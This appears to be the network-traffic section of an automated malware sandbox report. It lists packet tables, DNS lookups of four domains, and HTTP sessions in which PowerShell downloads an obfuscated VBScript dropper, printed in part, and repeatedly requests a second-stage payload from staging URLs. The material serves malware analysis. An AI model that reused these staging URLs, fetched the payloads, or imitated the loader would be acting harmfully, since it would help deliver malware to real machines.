                                                                            Dec 5, 2024 10:40:30.665685892 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:30.665740013 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:30.665868998 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:30.666071892 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:30.666090012 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.062766075 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.063942909 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:32.063990116 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.607696056 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.607884884 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.607942104 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:32.608208895 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:36.618702888 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:36.618747950 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:36.618833065 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:36.619052887 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:36.619061947 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:37.877587080 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:37.879091024 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:37.879105091 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:38.336647034 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:38.336713076 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:38.337193012 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:38.337485075 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:42.337739944 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:42.337798119 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:42.337920904 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:42.338118076 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:42.338129997 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:43.744760990 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:43.745975971 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:43.746000051 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:44.294302940 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:44.294475079 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:44.294540882 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:44.294861078 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:48.306463957 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:48.306540966 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:48.306672096 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:48.306868076 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:48.306885958 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:49.577987909 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:49.579250097 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:49.579292059 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:50.040007114 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:50.040086031 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:50.040131092 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:50.040481091 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:54.042030096 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:54.042085886 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:54.042166948 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:54.042402029 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:54.042417049 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.440092087 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.441257000 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:55.441272974 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.985881090 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.986058950 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.986196995 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:55.986978054 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:00.009308100 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:00.009360075 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:00.009449959 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:00.009670973 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:00.009685993 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.273096085 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.274707079 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:01.274744987 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.733983040 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.734050989 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.734128952 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:01.734853983 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:05.745781898 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:05.745836973 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:05.745908976 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:05.746215105 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:05.746226072 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:07.144364119 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:07.145567894 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:07.145613909 CET44349976148.251.114.233192.168.2.10
Dec 5, 2024 10:41:07.694411993 CET | 443 | 49976 | 148.251.114.233 | 192.168.2.10
Dec 5, 2024 10:41:07.694591999 CET | 443 | 49976 | 148.251.114.233 | 192.168.2.10
Dec 5, 2024 10:41:07.694647074 CET | 49976 | 443 | 192.168.2.10 | 148.251.114.233
Dec 5, 2024 10:41:07.694991112 CET | 49976 | 443 | 192.168.2.10 | 148.251.114.233
Dec 5, 2024 10:41:11.697592974 CET | 49990 | 443 | 192.168.2.10 | 184.171.244.231
Dec 5, 2024 10:41:11.697642088 CET | 443 | 49990 | 184.171.244.231 | 192.168.2.10
Dec 5, 2024 10:41:11.697796106 CET | 49990 | 443 | 192.168.2.10 | 184.171.244.231
Dec 5, 2024 10:41:11.698132038 CET | 49990 | 443 | 192.168.2.10 | 184.171.244.231
Dec 5, 2024 10:41:11.698146105 CET | 443 | 49990 | 184.171.244.231 | 192.168.2.10
Dec 5, 2024 10:41:12.961129904 CET | 443 | 49990 | 184.171.244.231 | 192.168.2.10
Dec 5, 2024 10:41:12.962521076 CET | 49990 | 443 | 192.168.2.10 | 184.171.244.231
Dec 5, 2024 10:41:12.962537050 CET | 443 | 49990 | 184.171.244.231 | 192.168.2.10
Dec 5, 2024 10:41:13.421901941 CET | 443 | 49990 | 184.171.244.231 | 192.168.2.10
Dec 5, 2024 10:41:13.421991110 CET | 443 | 49990 | 184.171.244.231 | 192.168.2.10
Dec 5, 2024 10:41:13.422075033 CET | 49990 | 443 | 192.168.2.10 | 184.171.244.231
Dec 5, 2024 10:41:13.422580004 CET | 49990 | 443 | 192.168.2.10 | 184.171.244.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 10:39:24.059613943 CET | 60737 | 53 | 192.168.2.10 | 1.1.1.1
Dec 5, 2024 10:39:24.197885990 CET | 53 | 60737 | 1.1.1.1 | 192.168.2.10
Dec 5, 2024 10:39:27.068306923 CET | 59780 | 53 | 192.168.2.10 | 1.1.1.1
Dec 5, 2024 10:39:27.297792912 CET | 53 | 59780 | 1.1.1.1 | 192.168.2.10
Dec 5, 2024 10:39:31.201029062 CET | 60807 | 53 | 192.168.2.10 | 1.1.1.1
Dec 5, 2024 10:39:31.342989922 CET | 53 | 60807 | 1.1.1.1 | 192.168.2.10
Dec 5, 2024 10:39:43.541732073 CET | 64512 | 53 | 192.168.2.10 | 1.1.1.1
Dec 5, 2024 10:39:43.840265989 CET | 53 | 64512 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 10:39:24.059613943 CET | 192.168.2.10 | 1.1.1.1 | 0x862b | Standard query (0) | www.fornid.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:27.068306923 CET | 192.168.2.10 | 1.1.1.1 | 0xcb3b | Standard query (0) | www.pineappletech.ae | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:31.201029062 CET | 192.168.2.10 | 1.1.1.1 | 0xd7c1 | Standard query (0) | www.almrwad.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:43.541732073 CET | 192.168.2.10 | 1.1.1.1 | 0xcc06 | Standard query (0) | www.erp-royal-crown.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 10:39:24.197885990 CET | 1.1.1.1 | 192.168.2.10 | 0x862b | No error (0) | www.fornid.com | fornid.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:24.197885990 CET | 1.1.1.1 | 192.168.2.10 | 0x862b | No error (0) | fornid.com | - | 93.95.216.175 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:27.297792912 CET | 1.1.1.1 | 192.168.2.10 | 0xcb3b | No error (0) | www.pineappletech.ae | - | 91.193.42.13 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:31.342989922 CET | 1.1.1.1 | 192.168.2.10 | 0xd7c1 | No error (0) | www.almrwad.com | almrwad.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:31.342989922 CET | 1.1.1.1 | 192.168.2.10 | 0xd7c1 | No error (0) | almrwad.com | - | 184.171.244.231 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:43.840265989 CET | 1.1.1.1 | 192.168.2.10 | 0xcc06 | No error (0) | www.erp-royal-crown.info | erp-royal-crown.info | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:43.840265989 CET | 1.1.1.1 | 192.168.2.10 | 0xcc06 | No error (0) | erp-royal-crown.info | - | 148.251.114.233 | A (IP address) | IN (0x0001) | false
• www.fornid.com
• www.pineappletech.ae
• www.almrwad.com
• www.erp-royal-crown.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49728 | 93.95.216.175 | 443 | 8104 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:25 UTC | 116 | OUT | GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
Host: www.fornid.com
Connection: Keep-Alive
2024-12-05 09:39:26 UTC | 553 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:39:25 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponly
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
2024-12-05 09:39:26 UTC | 7639 | IN | Data Ascii: 11e50<!DOCTYPE HTML>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7 " lang="it"><![endif]-->...[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="it"><![endif]-->...[if IE 8]><html class="no-js lt-ie9 ie8" lang="it"><![endif]-->...[i
2024-12-05 09:39:26 UTC | 136 | IN | Data Ascii: agamenti" title="Come acquistare" onclick="window.open(this.href);return false;">Come acquistare</a></li></ul></div>... /B
2024-12-05 09:39:26 UTC | 8192 | IN | Data Ascii: lock links module -->... Menu --><div id="tm_topmenu"><h4 class="title_block">Menu</h4><ul class="tree dhtml"><li class=""><a href="https://www.fornid.com/4-utensili-per-l-industria-e-l-edilizia" title="Utensili per l'industria e l'e
2024-12-05 09:39:26 UTC | 8192 | IN | Data Ascii: brificante" title="Olio lubrificante">Olio lubrificante</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.com/22-olio-idraulico" title="Olio idraulico ISO 32, 46 e 68">Olio idraulico ISO 32, 46 e 68</a></li><li class=""><a href="https://www
2024-12-05 09:39:26 UTC | 8192 | IN | Data Ascii: ><li class=""><a href="https://www.fornid.com/305-raccorderia-in-ottone-uso-civile-industriale-e-per-pompe-idrauliche" title="Raccorderia in ottone uso civile, industriale e per pompe idrauliche">Raccorderia in ottone uso civile, industriale e per pompe i
2024-12-05 09:39:26 UTC | 8192 | IN | Data Ascii: m/252-pompe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www
2024-12-05 09:39:26 UTC | 8192 | IN | Data Ascii: arrelli per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https
2024-12-05 09:39:26 UTC | 8192 | IN | Data Ascii: </div><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are n
2024-12-05 09:39:26 UTC | 8192 | IN | Data Ascii: spallet-elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO
2024-12-05 09:39:26 UTC | 416 | IN | Data Ascii: FFP1 - FFP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49741 | 91.193.42.13 | 443 | 8104 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:28 UTC | 79 | OUT | GET /na/mg.vbs HTTP/1.1
Host: www.pineappletech.ae
Connection: Keep-Alive
2024-12-05 09:39:29 UTC | 232 | IN | HTTP/1.1 200 OK
Connection: close
content-type: text/vbscript
last-modified: Thu, 27 Jun 2024 13:15:58 GMT
accept-ranges: bytes
content-length: 29287
date: Thu, 05 Dec 2024 09:39:28 GMT
server: LiteSpeed
vary: User-Agent
2024-12-05 09:39:29 UTC | 1136 | IN | Data Ascii: Function Seasoning(Ambrain)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Seasoning = ChrW(Ambrain)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroingenirer
2024-12-05 09:39:29 UTC | 14994 | IN | Data Ascii: Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats = "Decim
2024-12-05 09:39:29 UTC | 13157 | IN | Data Ascii: edness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarkasse = 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49754 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:32 UTC | 183 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:39:33 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:39:32 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:33 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49770 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:38 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:39:39 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:39:39 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:39 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49784 | 148.251.114.233 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:45 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:39:45 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:39:45 GMT
server: LiteSpeed
2024-12-05 09:39:45 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:45 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49797 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:51 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:51 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:51 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:51 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49813 | 148.251.114.233 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:56 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:57 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:57 GMT
    server: LiteSpeed
2024-12-05 09:39:57 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:57 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49828 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:02 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:03 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:03 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:03 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49841 | 148.251.114.233 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:08 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:09 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:09 GMT
    server: LiteSpeed
2024-12-05 09:40:09 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:09 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49857 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:14 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:14 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:14 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:14 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.10 | 49872 | 148.251.114.233 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:20 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:20 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:20 GMT
    server: LiteSpeed
2024-12-05 09:40:20 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:20 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.10 | 49885 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:26 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:26 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:26 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:26 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.10 | 49900 | 148.251.114.233 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:32 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:32 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:32 GMT
    server: LiteSpeed
2024-12-05 09:40:32 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:32 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 49912 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:37 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:38 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:38 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:38 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.10 | 49924 | 148.251.114.233 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
